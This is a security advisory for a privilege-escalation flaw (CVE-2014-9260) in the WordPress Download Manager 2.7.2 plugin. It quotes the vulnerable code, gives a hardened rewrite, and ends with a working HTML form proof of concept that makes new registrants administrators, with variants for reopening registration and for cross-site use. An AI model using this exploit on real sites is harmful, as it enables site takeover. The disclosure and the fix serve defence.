WordPress Download Manager 2.7.2 Privilege Escalation

Homepage:

https://wordpress.org/plugins/download-manager/

CVE-ID

CVE-2014-9260

CVSS Score

5.5

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:P/A:N)

Description:

wdm_ajax_settings() is accessible to every registered user: is_admin() is true for any request to wp-admin/admin-ajax.php regardless of the caller's role, and the wp_ajax_{action} hook fires for every logged-in user. Neither the hook registration nor the handler checks a capability (such as manage_options) or a nonce.

File: download-manager\hooks.php

if (is_admin()) {
    add_action('admin_enqueue_scripts', 'wpdm_admin_enqueue_scripts');
    add_action("admin_menu", "fmmenu");
    add_action('wp_ajax_wdm_settings', 'wdm_ajax_settings');
}

wdm_ajax_settings() dispatches on the user-supplied $_POST['section'] without any authorization check; with section=basic it calls basic_settings().

File: download-manager\wpdm-core.php

$stabs['basic'] = array('id' => 'basic', 'link' => 'edit.php?post_type=wpdmpro&page=settings', 'title' => 'Basic', 'callback' => 'basic_settings');
function wdm_ajax_settings()
{
    global $stabs;
    call_user_func($stabs[$_POST['section']]['callback']);
    die();
}

basic_settings() passes every POST parameter straight to update_option(), so a subscriber can overwrite any WordPress option, for example default_role, admin_email, users_can_register or blogname.

File: download-manager\wpdm-core.php

function basic_settings()
{
    if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {

        foreach ($_POST as $optn => $optv) {
            update_option($optn, $optv);
        }
        if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');



        die('Settings Saved Successfully');
    }
    include('settings/basic.php');
}
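The following is an added example, not code from the plugin: a hardened version of the two functions above. It assumes the WordPress core APIs current_user_can(), check_ajax_referer(), sanitize_key(), wp_send_json_error() and wp_die(); the option allowlist in basic_settings_hardened() is illustrative, since only __wpdm_login_form is visible on this page, and a nonce created with wp_create_nonce('wdm_settings') is assumed to be emitted by the settings page.

```php
<?php
// Added example (not plugin code). Assumes WordPress core functions:
// current_user_can(), check_ajax_referer(), sanitize_key(),
// wp_send_json_error(), wp_die(), update_option(), delete_option().

function wdm_ajax_settings_hardened()
{
    // 1. Capability check. is_admin() only means the request hit wp-admin/,
    //    not that the caller is an administrator.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection. The settings page is assumed to emit a nonce
    //    from wp_create_nonce( 'wdm_settings' ) in the _wpnonce field.
    check_ajax_referer( 'wdm_settings', '_wpnonce' );

    // 3. Dispatch only to a known tab; reject anything not registered in $stabs.
    global $stabs;
    $section = isset( $_POST['section'] ) ? sanitize_key( $_POST['section'] ) : '';
    if ( ! isset( $stabs[ $section ]['callback'] )
        || ! is_callable( $stabs[ $section ]['callback'] ) ) {
        wp_send_json_error( 'unknown section', 400 );
    }
    call_user_func( $stabs[ $section ]['callback'] );
    wp_die();
}

function basic_settings_hardened()
{
    // Allowlist of plugin-owned options and the sanitizer applied to each.
    // Core options (default_role, admin_email, users_can_register, ...) are
    // never writable from here. Names other than __wpdm_login_form are
    // placeholders for the plugin's own settings (assumed).
    $allowed = array(
        '__wpdm_login_form' => 'intval',
    );

    if ( isset( $_POST['task'] ) && $_POST['task'] === 'wdm_save_settings' ) {
        foreach ( $allowed as $optn => $sanitizer ) {
            if ( isset( $_POST[ $optn ] ) ) {
                update_option( $optn, call_user_func( $sanitizer, $_POST[ $optn ] ) );
            }
        }
        // Keep the original semantics: an absent checkbox clears the option.
        if ( ! isset( $_POST['__wpdm_login_form'] ) ) {
            delete_option( '__wpdm_login_form' );
        }
        wp_die( 'Settings Saved Successfully' );
    }
    include 'settings/basic.php';
}
```

The capability check closes the privilege escalation, the nonce check stops the same POST from being replayed cross-site against a logged-in administrator, and the allowlist removes the mass-assignment of arbitrary options even if the first two checks are ever bypassed.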

Proof of Concept:

Log in as a standard user (created via wp-login.php?action=register; any subscriber-level account will do), then submit:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
    <input type="hidden" name="task" value="wdm_save_settings">
    <input type="hidden" name="section" value="basic">
    <input type="hidden" name="default_role" value="administrator">
    <input type="submit" value="Hack!">
</form>

Then register a new user via wp-login.php?action=register. Because default_role is now administrator, the newly created user has administrator privileges. Since any option can be written the same way, a closed registration can first be reopened by sending users_can_register=1 in the same request; and because no nonce is checked, the form above also works when an administrator who is logged in submits it from an attacker-controlled page.

Timeline: